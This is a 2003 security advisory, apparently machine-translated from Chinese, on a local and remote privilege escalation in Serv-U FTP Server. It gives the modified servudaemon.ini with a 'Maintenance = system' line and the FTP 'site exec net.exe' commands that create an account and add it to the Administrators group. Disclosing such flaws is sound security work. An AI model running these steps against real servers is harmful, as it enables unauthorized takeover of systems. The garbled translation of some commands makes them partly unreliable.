Creation time: 2003-12-16
Article attribute: original
Article submission:
Zhaoyuan (zhaoyuan8881980_at_163.com)
Release date: December 1, 2003 (starting with "hacker x file")
Author: Zhao original (Purple Magic)
Email: _zihuan@163.com
Local upgrade: Yes
Remote improvement permission: Yes
Prerequisites: Change permissions to the Serv-U configuration file
Disclaimer: This is just a idea and method of promoting permissions.
First, affected software
Serv-U FTP Server 4.1.0.9 (and all previous versions)
Second, the affected system
Microsoft Windows Server 2003 All versions
Microsoft Windows XP All versions
Microsoft Windows 2000 All versions
Microsoft Windows NT All versions
Third, review
Serv-u ftp server is a FTP SSERVER software produced by Rhinosoft, which is currently widely used in the world. After study, I found that the configuration file of the Serv-U FTP Server is stored in the Servudaemon.ini file in the Serv-U FTP Server file directory. If a local restricted user or an attacker with normal permissions can touch the file and carefully construct the content in the servudaemon.ini file, you can use the FTP process to perform any command on the system on the system with system permission.
Fourth, defect analysis:
Serv-U FTP Serve will store the configuration information in the servudaemon.ini file after setting the user. Includes user permission information and accessible directory information. Local restricted users or remote attackers can read and write the file directory of the Serv-U FTP Serve, you can implement the FTP process in remote, local systems by modifying the Servudaemon.ini file in the directory in remote, local system with FTP system administrator privileges Execute any command. And is not affected by the system version. (User Information Selection "Storage and System Registration" is not affected by this defect
V. Test method:
1, local test
Suppose local restricted users can browse the file directory of Serv-U FTP Serve. Find the servudaemon.ini file. Open the original file with Notepad is:
[Global]
Version = 4.1.0.0 // Serv-U FTP Server version number
Processid = 584
RegistrationKey = UEYZ459WABR4LVRKIKH4DYW9F8V4J / AHLVPOK8TQOKYZ4D3WBYMIL1VKKJGDAELPDKSWM5DOXJSGW64YYYPDO WAGNUBUYCB
[Domains]
Domain1 = 127.0.0.1 || 21 | 127.0.0.1 | 1 | 0 // Host IP and domain name, port situation
[Domain1]
User1 = zihuan | 1 | 0
[User = zihuan | 1]
Password = RFE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = C: / / You can browse the directory
TIMEOUT = 600
Access1 = c: / | rwamlcdp
If you modify the servudaemon.in file to:
[Global]
Version = 4.1.0.0
Processid = 584
RegistrationKey = UEYZ459WABR4LVRKIKH4DYW9F8V4J / AHLVPOK8TQOKYZ4D3WBYMIL1VKKJGDAELPDKSWM5DOXJSGW64YYYPDO WAGNUBUYCB
[Domains]
Domain1 = 127.0.0.1 || 21 | 127.0.0.1 | 1 | 0
[Domain1] user1 = zihuan | 1 | 0
[User = zihuan | 1]
Password = RFE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = C: /
TIMEOUT = 600
Maintenance = system // authority type
Access1 = C: / | rwamelcdp
The above content is more than the original content, "Maintenance = system" modification is saved. Then execute the following command after logging in to the Serv-U FTP Server with FTP:
FTP> Open IP
Connected to IP.
220 Serv-U FTP Server V4.1.0.0 for Winsock Ready ...
User (IP: (NONE)): ID // Input Construction User
331 USER Name Okay, please send complete e-mail address as password.
Password: password // password
230 User logged in, proced.
FTP> CD WinNT // Enter Win2K Winnt directory, if you are WinXP or Windows Server 2003, you should be a Windows directory.
250 Directory Changed to / Winnt
FTP> CD System32 // Enter the System32 directory
250 Directory Changed to / Winnt / System32
FTP> Quote Site Exec Net.exe User Zihuan Zihuan / Add // Use the system's NET.EXE file to add users.
200 Exec Command Successful (TID = 33).
FTP> Quote Site Exec Net.exe Localhost Administrators Zihuan / Add / / Improved to Super User
This adds a super user with Zihuan passwords on the local system: zihuan. You can also use the quote site exec net.exe localhost administratrs user / add command to enhance the current user to the super-user group. Of course, any command can also be performed on the system.
statement:
This book is only used to describe the possible security issues, the author I and the hacker X-Archive Magazine does not provide any guarantee or commitment to this safety announcement. Due to dissemination, any direct or indirect consequences and losses caused by this article are responsible for the user, and the author does not assume any responsibility for this. The author has the right to modify and interpret this safety announcement. If you want to reprint or disseminate this article, you must ensure that the integrity of this article, including all content of the copyright statement. This article is not allowed to modify or increase the announcement without any authority.
Please contact if the problem please email: _zihuan@163.com.
